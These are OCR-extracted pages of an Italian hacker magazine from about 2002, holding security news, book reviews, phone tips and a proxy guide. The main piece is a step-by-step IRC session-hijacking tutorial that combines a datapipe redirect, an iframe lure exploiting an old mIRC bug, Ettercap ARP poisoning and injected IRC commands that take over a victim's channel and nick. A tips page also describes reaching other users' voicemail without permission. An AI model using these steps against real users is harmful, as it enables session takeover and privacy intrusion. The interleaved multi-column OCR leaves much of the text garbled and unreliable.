trebbe determinare gli indirizzi interni della
RETE sfruttando un bug nel codice della Network
adress translation (NAT).
Sono afflitte da questa falla tutte le piattaforme Li-
nux indistintamente.

Soluzione: applicare la patch resa disponibile


dal team di sviluppo: http://www.net-
filter.org/security/2002-04-
02-icmp-dnat.html. ! BUFFER OVERFLOW
Oppure applicare la seguente regola: iptables -A
IN WU-IMAPD
OUTPUT -m state -p icmp --state INVALID -j u-imapd è il demone imap prodotto dalla
DROP. K. K W Washington University (quelli di wu-ftpd,
per intenderci). Questo demone è vulnerabile a
un buffer overflow, che accade quando un
! PROMOZIONE MICROSOFT: SEI FALLE IN UNA utente richiede gli attributi di una mailbox par-
ziale. Quest'utente potrà eseguire codice arbi-
trario sul server con i permessi del demone o
ante sono le nuove falle ri- particolare di violare le difese anche crashare il server. Le versioni vulnerabili
T levate in IE candidato all’O- del PC. Cliccando sulla URL in sono la 2001.313 e la 2001.315.
scar del Buco, come migliore questione si esegue nella mac- Le patch per fissare questo bug sono già dis-
attore protagonista. La stessa china dell'utente uno script ponibili. Potete scaricare la patcha adatta dal
Microsoft ha rilasciato una nella zona di sicurezza "Com- (solito) sito securityfocus all'indirizzo:
patch cumulativa per IE che, puter Locale". http://online.securityfocus.com/bid/4
oltre a sistemare tutti i prece- Le altre due falle critiche ri- 713/solution/. K
denti buchi per IE 5.01, 5.5 e guardano il modo in cui IE ge-
6.0, corregge sei nuove vulnerabilità, fra cui tre clas- stisce i file Cascading Style Sheets e i cookie.
sificate particolarmente pericolose.
Di tutto il pacchetto “Falle Microsoft” la più pericolo-
Per scaricare le patch per stare tranquilli l’indirizzo è
questo: http://www.microsoft.com/win-
! BUG IN MSN CHAT
sa riguarda Explorer 6 e consente attraverso, una pa- dows/ie/downloads/critical/Q321232/ CONTROL
gina Web o una e-mail HTML trasportanti una URL MSN Chat Control è un controllo ActiveX
L' che permette a gruppi di utenti di radunarsi
default.asp. K

in un unico posto virtuale per chattare. Esiste un


! RILASCIATO CISCO PIX DEVICE MANAGER 2.0 buffer non controllato in una delle funzioni che
gestiscono i parametri di input nell'MSN Chat
control. Questo comporta un rischio di sicurez-
- Command Authorization za perché un utente potrebbe sfruttare questo
- DHCP Option 150 & 66 buffer overrun ed eseguire codice arbitrario sul
- Easy VPN Remote computer dell'utente colpito. Questo attacco
- Factory Default Configuration può essere effettuato o tramite un sito web o
- ILS Fixup tramite una e-mail in html. Fortunatamente la
- PPPoE Microsoft (che pensa a tutto) ha rilasciato una
- Stub Multicast Routing patch per Outlook che evita questo tipo di at-
- Turbo ACL tacco. Potete inoltre scaricare la patch per MSN
2 . New platforms/browsers Chat Control sul sito Microsoft all'indirizzo
stato rilasciato questa mattina il nuovo PIX - Internet Explorer 6
È device manager 2.0, interfaccia grafica di
http://www.microsoft.com/Down-
- Windows XP loads/Release.asp?Relea-
gestione del Cisco PIX firewall. - Red Hat Linux 7.1 and 7.2 seID=38790. K
Alcune delle nuove features : PDM 2.0 è downloadabile gratuitamente da
1 . Support for PIX 6.2 features cisco.com per chi ha l'accesso a software
- Auto Update center. K

“I CRETINI SONO PIÙ INGEGNOSI DELLE PRECAUZIO-


NI CHE SI PRENDONO PER IMPEDIRGLI DI NUOCERE”
> Murphy

www.hackerjournal.it | 11
news
! ASP’ETTA CHE TI BUCO
HACKBOOK
l nostro amico “Mantas” ci ha segnalato che il
I programma in asp “Snitz Forum”. Basta inseri-
http://pub47.ezboard.com/fsicurezza-
" KNOW YOUR ENEMY: netfrm3.showMessage?topicID=83.to-
REVEALING THE SECURITY TOOLS, re una piccola stringa di comando e si ottengono pic. K
TACTICS, AND MOTIVES OF THE di colpo tutti i dati relativi agli utenti registrati nel
BLACKHAT COMMUNITY data base compresi, e questo è grave, anche
quelli con diritti di amministrazione.
Autori: by The Honeynet Project (Editore), E’ facile ottenere dati personali e password,
L. Spitzner, B. Schneier, The Honeynet Project insomma entrare in possesso di tutit i dati
Pagine: 352 con sensibili.
CDROM Numerosi sono stati i Forum colpiti tra questi:
Anno: 2001 International Webmaster Association
Editore: Addison- (www.iwa-italy.org/) , www.village.it,
Wesley www.monteargentario.it, www.mirc-
ISBN: 0201746131 script.it, http://pippo.caltanet.it, eccette-
Livello: Intermedio / ra, eccetera. Per eliminare questa pericolosa
Avanzato vulnerabilità l’indirizzo rilevante in rete è:
Voto: 10/10
Costo: 39.99 $
! NETFILTER BUGGATO

I l nuovo progetto Honeynet (http:// proj-


ect.honeynet.org) fondato da Lance
Spitzner e da un gruppo di 30 professionisti
della security a livello mondiale tra cui i famosissi-
mi Fydoor (creatore di Nmap), Rain Forest Puppy
etfilter (iptables) può dare infor-
N mazioni su come avviene il port
forwarding in pacchetti ICMP non fil-
tradotto all'interno. In questo caso,
chi manda il pacchetto può vedere
l'indirizzo IP forwardato e si possono
(scopritore del famoso Explit di MDAC), Dug Song trati. Il bug coinvolge solo se all'uso recuperare informazioni su come è
(creatore di Dsniffer), e tanti altri si occupa di stu- di iptables si unisce NAT (Network configurato netfilter o sulla tipologia
diare a fondo le metodologie di attacco della co- Address Translation). Il vecchio ip- della rete. Al momento della stesura
munità hacker. chains non è vulnerabile. Il bug av- di quest'articolo non ci sono patch
La rete honeynet ha come scopo primario quella di viene così: quando una regola di disponibili per risolvere questo pro-
attrarre una grossa quantità di hackers tramite NAT viene applicata al primo pac- blema. In ogni modo, è consigliabile
macchine predisposte per essere compromesse , chetto di una connessione e succes- filtrare i pacchetti ICMP locali non
monitorate e di studiarne i comportamenti e gli at- sivamente questo pacchetto genera tracciati con il comando: iptables -A
tacchi. un messaggio ICMP d'errore, questo OUTPUT -m state -p icmp --state IN-
Nei primi 4 capitoli si accenna a cosa è un ho- viene mandato indietro con l'indirizzo VALID -j DROP. K
neypot e una honeynet oltre a menzionare i pro-
dotti commerciali più noti per la costruzione di ho-
neypot , mentre nella seconda parte e’ possibile ! BUFFER OVERFLOW IN TCPDUMP
trovare una dettagliata panoramica su come sia
possibile effettuare delle analisi di un sistema
compromesso a partire dai log dei firewall e degli l team di sviluppo di FreeBSD durante un
ids (intrusion detection system). I controllo del codice ha rilevato numerosi buf-
Viene inoltre presentata una parte di analisi avan- fer overflow in tcpdump, nelle versioni prece-
zata come il fingerprinting passivo e l’analisi foren- denti alla 3.5.
sica tramite l’utilizzo di Toroner’s toolkit. Nel terza Comunque le versioni più recenti di tcpdump
parte del libro e’ presente una parte di analisi dei (compresa la 3.6.2) sono vulnerabili ad un altro
comportamenti psicologici di un hacker e lo stu- buffer overflow nelle funzioni di decoding AFS
dio di un caso reale di una macchina compromes- RPC.
sa. Completano il libro varie appendici che indica- Queste vulnerabilità potrebbero essere sfrutta-
no come utilizzare snort per loggare tutti i pac- te da un utente remoto sia per crashare il pro-
chetti del nostro honeypot, e vari databases di fin- cesso tcpdump o addirittura eseguire codice
gerprint passivo tramite TCP ed UDP. arbitrario sul server con i permessi di tcpdump,
Il cdrom include una serie di tools utilizzati dal che quasi sempre è root. http://www.mandrakesecure.net/en/
progetto honeynet per la cattura e l’analisi dei Per trovare la patch adeguata consultare l'advi- a d v i s o r i e s / 2 0 0 2 / M D K S A- 2 0 0 2 -
dati; sono inoltre presenti una serie di logs di sory pubblicato da MandrakeSoft all'indirizzo 032.php. K
macchine compromesse per la successiva ana-
lisi e lo studio. “FAI UN PROGRAMMA CHE ANCHE UN IDIOTA PUÒ
Un libro consigliato a coloro che vogliono impara- USARE, E SOLTANTO UN IDIOTA VORRÀ USARLO”
re a fondo tecniche di analisi divertendosi. K
> Principio di Shaw

12 | www.hackerjournal.it
news

! TRIPWIRE RILASCIA TRIPWIRE


PER NETWORK DEVICES. HACKBOOK
ripwire per Network Devices e' una particola- "
T re versione del noto programma che assicura
LA SICUREZZA DEI SERVER
WINDOWS NT/2000 IN INTERNET
l'integrita' e la security di router,switches e fire-
walls. http://www.tripwire.com/pro- Autori: Stefan
ducts/network_devices/ K Norberg
Pagine: 222
Anno: 2001
! CERT RILASCIA PAPER SU VULNERABILITÀ DHCP Editore: Hops Libri
ISBN: 88-8378-023-X
Livello: principiante
l bollettino è chiamato CA-2002-12: Format Voto: 8/10
I String Vulnerability in ISC DHCPD ed è repe- Costo: 21.69 $
ribile alla url:
http://www.cert.org/advisories/CA-
2002-12.html K

! LE VENTI VULNERABILITÀ PIÙ CRITICHE…


L’ autore dopo aver lavorato come re-
sponsabile della security in Hewlett
Packard si occupa ora di consulenza
sulla network security per le maggiori aziende
mondiali. Il libro rappresenta un’ottima fonte
di informazione per tutti quei system admini-
strators che si trovano a lavorare su piattafor-
uali sono i richi più grossi dei Server che me Windows NT/2000. All’interno troviamo
Q operrano in Internet? Lo ha definito in modo una panoramica di come sia possibile, parten-
inequivocabile il SANS Institute e il National In- do dalla installazione di base irrobustire i pro-
frastructure Protection Center (NIPC) che ha pri server; inoltre è presente una sezione di
pubblicato le venti vulnerabilità più critiche per come aumentare la propria sicurezza perime-
la sicurezza dei Web server. trale e l’amministrazione remota tramite l’uti-
Sono divise in tre categorie: vulnerabilità gene- del CERT/CC e del SANS Institute. lizzo di alcuni tools come openssh, tcp wrap-
rali, vulnerabilità di Windows e vulnerabilità di Questo fondamentale documento è stato tra- pers, vnc e CygWin. K
UNIX. dotto a cura del Centro Ricerche di Data Secu-
Lo studio è frutto del lavoro dei maggiori esper- rity, ed è disponibile all'indirizzo
ti intenazionali delle agenzie federali americane, http://www.datasecurity.it/top20/, " HACKING EXPOSED WINDOWS
dei produttori di software e delle più importanti dove può essere tranquillamente consultato e 2000: NETWORK SECURITY SECRETS &
aziende di consulenza, di ricerche universitarie, scaricato. K SOLUTIONS
Autori: J. Scambray,
! VULNERABILITÀ IN SHADOW/PAM-MODULES S. McClure
Pagine: 500
Anno: 2001
l pacchetto shadow contie- di root, nel peggiore dei casi. Editore: McGraw-
I ne molti programmi utili per Fortunatamente non è possi- Hill Professional
gestire le voci in /etc/passwd bile con un'installazione di Publishing
e in /etc/shadow. default. ISBN: 0072192623
Il SuSE Security Team ha Il bug è stato risolto control- Livello: principiante
scoperto una vulnerabilità lando l'integrità dei dati scrit- Voto: 9/10
che permette a un normale ti in files temporanei prima di Costo: 49.99 $
utente di distruggere questi essere mossi a files specifici
files o di estendere i privilegi
per determinati gruppi di
utenti.
Questo è possibile dei limiti
di dimensione dei files sba-
nel sistema.
Per risolvere totalmente il
problema si deve aggiornare
sia il pacchetto shadow sia il
pam-modules.
R appresenta la guida assoluta per im-
parare come rendere sicuro il proprio
sistema Windows 2000. Nei 17 capi-
toli sono trattati a fondo argomenti come la
debolezza del protocollo NETBIOS, l’imple-
gliati e invocando uno dei La patch adeguata per il vo- mentazione di metodologie per rendere sicuro
programmi modificando i fi- stro sistema operativo è dis- Internet Information Server 5 e la messa in si-
les di sistema. ponibile all'indirizzo: curezza di Sql Server o Terminal Server. Le ap-
A seconda dei permessi dei http://www.suse.de pendici del libro spiegano come hardenizzare il
binari di sistema, questo problema potrebbe /de/support/security/2002_17_sh proprio sistema Win 2000 partendo da chec-
far sì che un utente normale guadagni i livelli adow.html. K klist basate sulle esperienze degli autori. K

www.hackerjournal.it | 13
pratica

LA PRIVACY PRECARIA DELLE COMUNICAZIONI IRC

IRC hijacking
Lo staff di Onda Quadra entra alla grande in HJ con un articolo sui problemi
di sicurezza delle sessioni IRC. Li abbiamo scelti perché sono competenti, simpatici
e hanno lavato la macchina a tutti quelli della redazione...

Ettercap permette di fare hijacking in Hijacking: è una tecnica che per-


LISTA DELLA “SPESA”
1. Premessa
2. Intro
maniera semplice ed efficace utilizzando
una tecnica conosciuta come ARP poisoning
che consente di avvelenare la cache ARP di
host locali al fine di alterarne il processo di
? mette di intromettersi in una connes-
sione esistente e prenderne il control-
lo. Molte volte basterebbe usare uno
sniffer per catturare username e pas-
3. Requisiti risoluzione degli indirizzi IP in indirizzi MAC sword per poi collegarsi "legalmente".
Tuttavia è possibile trovarsi in situazio-
4. Hijacking ni in cui vengono usate password
4.1. Datapipe IRC: Internet Relay Chat "usa e getta" e quindi, anche se l'at-
4.2. mIRC Bug
5. Characters Injection
6. Risorse
? Protocollo per le chat in Internet. Un
server può avere numerose chat
room, chiamate anche channels.
taccante riuscisse a sniffarne qualcu-
na, quando andrà ad usarle queste
saranno già scadute.

1 Premessa
Non è intenzione dell'autore del presente
Ettercap
E' un tool che permette di sniffare e fare hi-
jacking di una sessione utilizzando svariate
host locale 192.168.1.5 verrà rediretta
verso il server IRC di Azzurra. Ora non
vi resta che nattare(2) la porta 6667 sul
articolo incentivare alcuna azione atta a tecniche tra cui l'avvelenamento delle cache vostro router di confine per permettere
ledere la privacy, bensì con il presente si ARP che sarà quella di cui mi servirò in se- una connessione proveniente dall'ester-
intende dimostrare l'estrema facilità con guito; no verso l'host locale che esegue il da-
cui un utente malintenzionato possa met- tapipe.
tere a segno un attacco atto a minare l'in- ! LAN con due host Unix/Linux connessi a
tegrità della comunicazione durante una Internet. Il primo eseguirà il datapipe e ospi- (2)nattare: deriva da NAT (Network Ad-
sessione IRC. terà la sessione, l'altro host sarà quello dal dress Translation), permette la traduzio-
quale eseguiremo Ettercap per fare hijac- ne di un indirizzo IP in un altro, nel no-

2 Intro king della sessione che rimbalza su di noi. stro caso permette di mettere in relazio-
ne la porta 6667 del router di confine
Lo scopo di questo articolo è quello di il-
lustrare una tecnica che permetta di
prendere possesso della sessione di un
4 Hijacking con la stessa porta di un host interno al-
la rete locale (192.168.1.5) al fine di
permettere l'accesso da parte di host
utente al fine di inviare messaggi al ca- 4.1 Datapipe esterni.
nale ed interagire con ogni comando del Procuratevi un datapipe, personalmente
server IRC in genere. ho utilizzato datapipe.c di Jeff Lawson, 4.2 mIRC Bug
ponete in ascolto la porta 6667 median- Ora il vostro sistema è pronto per rice-

3 Requisiti
Ecco una breve lista di ciò di cui ho avuto
te l'utilizzo del datapipesu uno dei due
host che prendono parte alla vostra rete
locale e fate inmodo che il traffico in in-
vere una connessione da parte di un
utente remoto, il quale verrà reinstrada-
to tramite datapipe al server IRC in mo-
bisogno per mettere in pratica quanto ver- gresso su tale porta venga rediretto ver- do del tutto trasparente, non dovete far
rà detto in seguito. so il server irc sulla porta 6667, esempio: altro che trovare un utente che si con-
netta con il client IRC al vostro datapipe.
Datapipe attacker@datapipe:~$ ./datapipe Un utente malizioso potrebbe sfrutta-
Permette di redirigere il traffico in in- 192.168.1.5 6667 irc.azzurra.org 6667 re un bug abbastanza conosciuto del
gresso su una determinata porta dell'- mIRC 5.9 e 5.91 per far connettere la
host locale verso un host e una porta A questo punto qualsiasi connessio- vittima al proprio datapipe, la vulnerabi-
arbitrari. ne in ingresso sulla porta 6667 dell'- lità consiste nella possibilità di costruire

14 | www.hackerjournal.it
>>
una pagina web contenente un partico- Nel nostro caso l'IP sorgente è quello [00:32:19] <E4zy> ciao
lare tag html che permette di lanciare il dell'host su cui gira il datapipe ovvero [00:33:03] <victim> come va?
client mIRC e farlo connettere ad un ser- 192.168.1.5 e l'IP dell'host destinatario [00:33:17] <E4zy> tutto bene, grazie
ver arbitrario specificato all'interno della è quello del gateway cioè 192.168.1.1,
pagina html stessa. una volta scelti questi IP nella maniera ...verrà riportata come output di Ettercap
opportuna sarà possibile procedere al in un formato un po' meno leggibile, do-
<iframesrc="irc://vostro_IP:6667"> poisoning della cache ARP dei due host ve sulla sinistra viene riportato il traffico
mediante la pressione del tasto A. in uscita dal client diretto al server, men-
Basterà che la vittima visiti la pagina tre sulla destra il traffico in uscita dal ser-
web contenente il tag html appena illu- ettercap 0.6.3.1 ver diretto verso il client:
strato per causare la connessione della
stessa all'IP specificato. SOURCE: 192.168.1.5 <Filter: OFF ettercap 0.6.3.1
doppleganger illithid (ARP Based)
4.3 Ettercap DEST: 192.168.1.1 <Active Dissector: SOURCE: 192.168.1.5 < Filter: OFF
Ora che avete un utente potenziale ON doppleganger illithid (ARP Based)
connesso al server IRC tramite il vostro DEST: 192.168.1.1 < Active Dissector:
datapipe potete alterare la sessione di 5 hosts in this LAN (192.168.1.4: ON
tale utente a vostro piacimento. 255.255.255.0)
Ettercap permette di fare hijacking 5 hosts in this LAN (192.168.1.4:
in maniera semplice ed efficace utiliz- 1) 212.171.XXX.XX: 3600 <--> 255.255.255.0)
zando una tecnica conosciuta come 192.168.1.5:6667 silent 192.168.1.5:1028
ARP poisoning che consente di avvele- 2) 192.168.1.5:1028 <--> 192.106.224.132:6667
nare la cache ARP di host locali al fine 192.106.224.132:6667 silent PRIVMSG #ondaquadra :ciao
di alterarne il processo di risoluzione e 4 z y : E 4 z y ! ~ n o n e @ A z z u r r a N e t-
degli indirizzi IP in indirizzi MAC. Ora il traffico tra i due host risulta 65135.42-151.
Ettercap inoltre permette di inserire dirottato e possiamo osservare e modi- PRIVMSG #ondaquadra :come va
traffico arbitrario all'interno della ses- ficare a nostro piacimento i dati in in- net24.it PRIVMSG #ondaquadra :ciao.
sione provvedendo a ricalcolare i gresso/uscita.
campi sequence number e acknowled- Nell'esempio qui sopra la voce 1) si :E4zy!~none@AzzurraNet-65135.42-
gement number al fine di mantenere riferisce alla sessione stabilita tra il client 151.
la sincronizzazione della connessione. IRC remoto e il datapipe, mentre la vo- net24.it PRIVMSG #ondaquadra :tutto
L'utilizzo di un secondo host si ren- ce 2) rappresenta la sessione tra data- bene, grazie.
de necessario in quanto Ettercap pipe e server IRC.
NON permette l'avvelenamento della ASCII
cache ARP dell'host sul quale viene Datapipe: Programma che ridi- ASCII
eseguito, pertanto sarebbe impensa-
bile eseguire il datapipe e Ettercap
sullo stesso host per le limitazione ap-
pena evidenziate.
? reziona tutti i pacchetti tcp diretti
ad una porta su macchina ad un
altra porta su un altra (o stessa)
macchina.
Usando il tasto TAB è possibile pas-
sare da una metà schermo all'altra in
modo tale da poter intervenire sul lato
Per maggiori informazioni: client o sul lato server a seconda di do-
attacker@attack:~# ettercap http://www.s0ftpj.org/en/too ve si trova la finestra attiva.
ls.html
ettercap 0.6.3.1

5 hosts in this LAN (192.168.1.4 :


5 Character Injection
Per adempiere al nostro scopo abbiamo
255.255.255.0) bisogno di spostarci sul server side (una
sola pressione del tasto TAB) al fine di
1) 192.168.1.4 1) 192.168.1.4 inviargli comandi da parte del client di-
2) 192.168.1.1 2) 192.168.1.1 rottato, a questo punto premendo il ta-
3) 192.168.1.2 3) 192.168.1.2 sto I si aprirà una finestra che ci per-
4) 192.168.1.3 4) 192.168.1.3 mette di iniettare dei comandi nello
5) 192.168.1.5 5) 192.168.1.5 stream che verranno elaborati dal ser-
ver, vediamo un esempio:
Il menù principale di Ettercap è co- A questo punto selezioniamo la ses-
stituito dall'elenco degli IP degli host sione 2) e iniziamo ad osservare il traf- ettercap 0.6.3.1
che prendono parte alla rete locale. fico che transita in chiaro sul nostro seg- SOURCE: 192.168.1.5 < Filter: OFF
Dovremo procedere selezionando dal- mento di rete, una breve conversazione doppleganger illithid (ARP Based)
l'elenco a sinistra l'IP dell'host sorgente come questa... DEST: 192.168.1.1 < Active Dissector:
della sessione e a destra quello dell'- ON
host destinatario. [00:31:11] <victim> ciao e4zy 5 hosts in this LAN (192.168.1.4:

www.hackerjournal.it | 15
pratica

LA PRIVACY PRECARIA DELLE COMUNICAZIONI IRC

255.255.255.0) server comunicano, qui di seguito vi

192.168.1.5:1028
192.106.224.132:6667
propongo una serie di esempi un po'
più fantasiosi: LINKS
PR Type characters to be injected (max JOIN #canale LE VERSIONI
1000): PR Fa joinare la vittima in un canale a vostra DI ETTERCAP
2-151. scelta.
PRIVMSG #ondaquadra :sono stupi- NICK nickname In questo elenco
do!\r\n Cambia il nick della vittima in uno di vo- riportiamo tutti
tutto stro gradimento gli indirizzi
2-151. MODE #canale +o nickname rilevanti che riguardano
tutto Fa si che la vittima oppi nickname nel ettercap, da cui è possibile
2-151. canale specificato, il nickname potrebbe effettuare i download (anche
tutto essere il vostro. della versione 6.5.0) e in
ASCII KICK #canale nickname cui approfondire tutte le
Fa si che la vittima kicki nickname nel ca- sezioni trattate nell’artico
nale specificato. “made in Onda Quadra”.
PRIVMSG nickname :msg
Invia una query a nickname da parte
della vittima contenente il testo msg. Homepage:
ns ACCESS ADD mask http://ettercap.sourceforge.net/
Se il server IRC su cui si trova la vittima
dispone di servizi come Nickserv, Tar/GZ:
potete addare la vostra mask in modo http://ettercap.sourceforge.ne
da essere riconosciuti come proprietari t/index.php?s=download
del nick... non siate lameri :)
Questi comandi dovranno essere Changelog:
sempre seguiti dai caratteri \r\n che ne http://ettercap.sourceforge.ne
permettono l'esecuzione da parte del ser- t/index.php?s=history
ver.
Quando inviamo comandi al lato ser- Provando a sniffare una vostra sessio-
ver è sempre bene farli seguire dai carat- ne sarete in grado di evidenziare ulteriori
teri \r\n che sostituiscono la pressione del comandi utilizzabili in tale contesto.
tasto INVIO che ne permette l'esecuzione,
ecco il risultato del comando precedente:

[00:31:11] <victim> ciao e4zy


6 Risorse
# mount -t mind /dev/brain /mnt/head
[00:32:19] <E4zy> ciao README.ettercap.txt. K
[00:33:03] <victim> come va? E4zy
[00:33:17] <E4zy> tutto bene, grazie
[00:33:49] <victim> sono stupido!
NAT: Network Address Translation RPM package:
L'ultima frase pronunciata dalla vit-
tima non è farina del suo sacco bensì è
il frutto dell'iniezione di caratteri da
parte dell'attacker nella sessione dirot-
? Sistema che, interposto fra Internet
e la rete interna, serve a mascherare
l'indirizzo IP di rete del computer,
sostituendone dinamicamente
http://ettercap.sourceforge.net/
index.php?s=download&p=binary

Debian package:
tata. un altro. Ciò consente di utilizzare http://ettercap.sourceforge.net
Il client IRC della vittima sarà l'unico all'interno di una rete indirizzi IP /index.php?s=download&p=binary
a non visualizzare tale frase pertanto non ufficiali, anche se corrispondo
non desterà in lei alcun sospetto, il a numeri IP realmente esistenti CVS tree (cvsweb):
messaggio sarà in ogni caso visibile da su Internet. Il computer usa questo IP http://cvs.sourceforge.net/cgi
tutti gli utenti del canale. nelle comunicazioni interne alla rete. -bin/viewcvs.cgi/ettercap
L'iniezione di caratteri all'interno Quando il computer deve comunicare
della sessione TCP non si limita a forni- con l'esterno, il NAT gli attribuisce
re la possibilità di inoltrare messaggi al un numero IP ufficiale con il quale
canale da parte della vittima, bensì viene visto dall'esterno. Il NAT, inoltre,
permette l'esecuzione di ogni genere di abbinato al ICS, permette a più PC
comando sul server IRC alla sola con- in rete locale, di condividere un
dizione di conoscere il protocollo a li- singolo accesso ad Internet.
vello applicazione con cui il client e il

16 | www.hackerjournal.it
tips &tricks

>> NEWBE

CODICILLI PER I CELLULARI

Cellulare col trucco


Molti non lo sanno, ma esistono una serie di combinazioni di tasti in grado
di attivare funzioni segrete e più o meno utili del cellulare, senza fare grossi danni…

Q uante sono le opzioni del


cellulare che vengono
abitualmente usate? Il
venti per cento del totale?
Forse anche meno… A
fronte di manuali di 100 pagine in cui
viene spiegato minuziosamente tutto
Telefonare gratis
Provate a impostare il motore
di ricerca con le parole chiave
hacker+cellulari, troverete una serie
di combinazioni di tasti alfanumerici
per telefonare a gratis! Ne esistono
per tutte le marche di cellulari,
TRUCCHI ASSORTITI

Nokia 3210-3310-5110-6110-8210
Ecco alcuni trucchi funzionati con modelli
Nokia.
*3370# migliora la ricezione del segnale
ma aumenta il consumo del telefonino
il funzionamento del cellulare di ulti- l’unica controindicazione è che (#3370# disatt.)
ma generazione, c’è l’insanabile vo- l’operatore dopo una ventina di giorni *4720# fa consumare meno il telefonino
glia di provare subito a chiamare… blocca la scheda telefonica: bisogna ma diminuisce la ricezione del segnale
Usare il telefonino è prioritario, poi vedere se il gioco vale la candela... (#4720# disatt.)
viene il resto. *#0000# Visualizza la versione del softwa-
Acquistare un tri-band, con tecno- re del cellulare
logia GPRS o Bluetooth , capace di in- Vi piacerebbere mandare messaggi *#92702689# oppure #*war0anty#
viare e ricevere mms e usarlo solo per alle segreterie telefoniche degli utenti Premendo il tasto navy si scorre nelle se-
chiamare e rispondere è un po’ come GSM, anche se non hanno abilitato il guenti voci:
possedere un paio di accendini e sfre- servizio? Come? Il principio è davvero - Numero seriale (Serial No.)
garli tra loro, con fare neanderthalia- semplicissimo. - Mese e Anno di produzione (Made)
no, per ottenere la combustione ne- L'abilitazione della segreteria te- - Data di acquisto (Purchasing date)
cessaria ad accendere una sigaretta… lefonica cellulare in realtà non è altro - Ultima riparazione (Repaired)
Ma, prescindendo dai comandi tra- che una deviazione delle chiamate in da questo menu si esce spegnendo il tele-
dizionali, codificati nei manuali, esi- arrivo verso un secondo numero, fonino.
stono combinazioni di tasti che con- molto simile al proprio numero di te- *3370# e #3370# Per attivare e disattiva-
sentono di ottenere un qualcosa in lefono. re l'Enhanced Full Rate, dopo un reinizializ-
più… Tra tutti i trucchi rintracciabili Chiamata ---> Numero 1 ---> zazione del telefono. L'EFR è una modalità
anche in rete ce n’è uno davvero utile. Numero 2 (Cellulare) (Segreteria) di funzionamento, non supportata da tutti i
Si tratta di un’op- Dunque, se con un altro cellulare gestori di rete, che permette di migliorare la
zione valida pra- GSM chiamiamo DIRETTAMENTE il se- qualità dell'audio a danno della durata del-
ticamente per condo numero, quello della segrete- la carica della batteria.
tutti i cellulari che ria, potremo accedere al servizio, an- *4720# e #4720# Per attivare e disattiva-
impedisce ad che se l'utente non ha attivato la de- re l'Half Full Rate dopo la reinizializzazione
eventuali ladri di viazione chiamate verso quell'altro del telefono. Il risultato è simile a quello
usare il impune- numero! Quando l'utente accenderà il dell'EFR (audio migliore, batteria più breve).
mente il vostro cellulare, riceverà un messaggio SMS nn# Visualizza il numero telefonico memo-
telefonino. Per che lo avvertirà della presenza di un rizzato nella posizione nn della rubrica.
ottenere il numero di serie del vostro certo numero di messaggi nella segre-
cellulare, battete i tasti: *#06#. Un co- teria. Ecco a quali numeri telefonare: Motorola V3688
dice a 15 cifre apparirà sullo schermo. Per i cellulari TIM: (p)(p)(p)191(p)1(p) ok attiva EFR
Questo codice è unico. Scrivetelo e Prefisso / 55 / Numero (p)(p)(p)191(p)0(p) ok disattiva EFR
conservatelo preziosamente. Se vi ru- Per i cellulari OMNITEL:
bano il cellulare, telefonate al vostro Prefisso / 20 / Numero. K Siemens C25, C35, M35, S35
operatore e dategli questo codice. Il *#0606# mostra il codice segreto, ma so-
vostro telefono potrà essere completa-
mente bloccato, anche se il ladro cam-
bia la scheda SIM. ? SMS: Sistema con il quale i telefoni
cellulari ricevono brevi messaggi
di testo, fino a 168 caratteri.
lo senza scheda.
*#002# Cancella tutte le deviazioni di
chiamata. K

www.hackerjournal.it |17
in rete

>>
NASCONDERE IL PROPRIO IP CON I SERVER PROXY

Navigare anonimo
Quando navighiamo in Internet veniamo catalogati,
riconosciuti, ci scaricano sul PC i "biscottini" per schedarci
ma c'è, fortunatamente, un modo per sfuggire a tutto ciò...

>> Anonymizer
F
orse non tutti lo
sanno, ma esiste
un Grande Fratel-
e i suoi fratelli...
lo estremamente
ingombrante e curioso che ci os- Sempre in tema di anonimato Anonymi-
serva. Anzi ci spia. E come mezzo zer (http://www.anonymizer.com) è un
privilegiato per carpire informa- altro sito che consente di navigare in mo-
zioni sul nostro conto personale do completamente anonimo, scherman-
utilizza proprio Internet e le no- do l'IP. Ma non è il solo. Iprive.com
stre connessioni alla rete. (http://www.iprive.com/bar/in-
Basta collegarsi ad un sito, ma- dex.html) propone una barra di navi-
gari un portale con molto traffico, >> Il garante gazione da integrare al browser (Explo-
come quelli delle grandi società rer 5). Si scarica in formato zippato e si
che operano in Internet, e il no- della Privacy installa come un accessorio di Explorer
stro computer comincia a stringe- consentendo di navigare in segreto scri-
re una serie di relazioni con il ser- Per evitare questo tipo di intrusioni si vendo l'indirizzo non nello spazio abitua-
ver a cui ci si è collegati. Relazio- possono usare dei server proxy ovvero le del browser ma in quello della barra
ni che si riducono sostanzialmen- dei server che garantiscono l'anonimato aggiuntiva.
te ad uno scambio di informazio- frapponendosi tra voi e il PC remoto che Surfola (http://www.surfola.com) è
ni, come il rilascio da parte del a cui vi state collegando ed evitando la un serve proxy molto frequentato che of-
server stesso dei cosiddetti co- trasmissione di dati. fre lo stesso servizio di Anonymizer e co.
okies, ovvero i "biscottini". Uno dei più noti ha un nome che è Altri siti che risultano rilevanti sono
Si tratta di piccoli file di testo che quasi premonitore "Anonymouse" h t t p : / / w w w . r e w e b b e r. d e ,
vengono registrati sul disco rigido (http://nonymouse.com/) e la sua http://www.ultimate -
del computer, spesso senza che home page è piuttosto spartana. anonymity.com e http://www.spa-
l'utente se ne accorga, attraverso Qui le opzioni sono davvero limitate. ceports.com. K
i quali, il server che li ha rilascia- E' disponibile uno spazio dove digitare
ti può riconoscere l'utente ogni l'indirizzo del sito che si vuole visitare in
volta che questo si collega al sito. tutta sicurezza e completo anonimato. ANONIMITY 4 PROXY
Praticamente si viene schedati e Navigando dalla finestra di Anony-
ad ogni navigatore viene dato, mouse si è al sicuro dai "Cookies" ma
anche se solo virtualmente, un non solo, infatti il sito cripta l'indirizzo e
volto. i dati del computer del navigatore e ri-
Ma questo è solo uno degli esem- esce anche a sanare alcuni problemi di
pi banalissimi. In realtà i grossi compatibilità che generalmente nasco-
gruppi che operano in Internet no visitando siti che utilizzano elementi
hanno proprio bisogno di censire in Flash o Shokwave. Due programmi
e riconoscere i propri utenti, per- visuali di largo consumo per animazioni
ché questi rappresentano al mo- su web.
mento attuale la loro unica vera Quando l'amministratore di un ser- All'indirizzo
ricchezza. ver scandaglia le visite al sito può rileva-
http://www.inetprivacy.com/dl.ht
re in tutta comodità gli indirizzi IP di chi
Proxy Server: Server che si si è collegato, ma chi ha avuto l'accor- m#a4proxy si può scaricare il

? interpone fra la rete interna ed


Internet per consentire un controllo di
sicurezza dei dati in entrata e in
uscita e per ottimizzare la
tezza di navigare usando Anonymouse
lascerà la posto del proprio IP una serie
di +++++++++++++++++.
